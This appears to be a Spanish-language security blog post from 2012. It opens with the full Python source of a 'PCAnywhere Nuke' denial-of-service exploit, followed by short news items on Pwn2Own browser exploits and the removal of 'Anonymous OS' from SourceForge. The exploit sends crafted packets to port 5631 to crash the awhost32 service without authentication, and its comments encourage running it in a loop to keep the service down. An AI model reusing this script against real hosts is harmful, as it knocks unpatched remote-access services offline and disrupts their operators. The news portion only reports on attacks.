EXPLOIT QUE HACE FALLAR

Es un codigo en Phyton que puede causar una denegación de servicios (DoS), en versiones de pcanhywere en windows, incluso parcheadas (versiones 12.5.0 build y 463 posteriores).

Breve Script pcanywhere nuke hace fallar (crash) ashost32 sin necesidad de autenticar

#!/usr/bin/python

'''

Exploit Title: PCAnywhere Nuke

Date: 2/16/12

Version: PCAnyWhere (12.5.0 build 463) and below

Tested on: Windows

Description: The following code will crash the awhost32 service. It'll be respawned

so if you want to be a real pain you'll need to loop this.. my inital impressions

are that controlling execuction will be a pain.

'''

import sys

import socket

import argparse

if len(sys.argv) != 2:

print "[+] Usage: ./pcNuke.py "

sys.exit(1)

HOST = sys.argv[1]

PORT = 5631

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((HOST, PORT))

# HELLO!

s.send("\x00\x00\x00\x00")

buf = s.recv(1024)

# ACK!

s.send("\x6f\x06\xfe")

buf = s.recv(1024)

# Auth capability part 1

s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")

# Auth capability part 2

s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")

Se le suma también recientes filtraciones de código fuente con intento de extorsión incluido, podemos observar que no corren buenos tiempos para Symantec..

Chrome, IE y Firefox vulnerados en Pwn2Own

http://blog.segu-info.com.ar/2012/03/chrome-cae-los-primeros-5-minutos-en.html

http://blog.segu-info.com.ar/2012/03/ie-9-segundo-en-caer-con-dos-0days.html

https://www.zdnet.com/blog/security/researchers-hack-into-newest-firefox-with-zero-day-flaw/10663

El exploit se aprovecha de una vulnerabilidad del navegador y es capaz de sortear con exito las protecciones DEP y ASRL, que son dos herramientas de windows, para ofrecer mayor protección contra exploits.
Se pudo ejecutar la misma vulnerabilidad en 3 ocaciones, en la primera se pudo filtra información, en la segunda direcciones de datos y en la tercera ejecución de codigos

SourceForge, removió definitivamente de sus registros al sistema operativo basado en Linux que supuestamente había sido desarrollado por el grupo hacktivista Anonymous. SourceForge sostuvo que al parecer no tenía ninguna conexión con la agrupación y que su nombre llama alevosamente a la confusión, además de carecer de transparencia en términos de seguridad. Tras su lanzamiento habían surgido voces cuestionando su seguridad. “Por ello decidimos retirar esta descarga y suspender este proyecto hasta que poseamos más información que nos pudiera llevar a pensar distinto”, expuso el equipo del sitio en su blog. Una polémica bien álgida se formó en torno a la posibilidad de que el software desarrollado en Ubuntu Linux pudiera contener malware. Al respecto, Graham Cluley, consultor de Sophos, señaló en el blog de Naked Security que a pesar de que la compañía aún no había analizado el código, “no sería una sorpresa si es que un troyano se hubiera filtrado dentro del Anonymous OS”.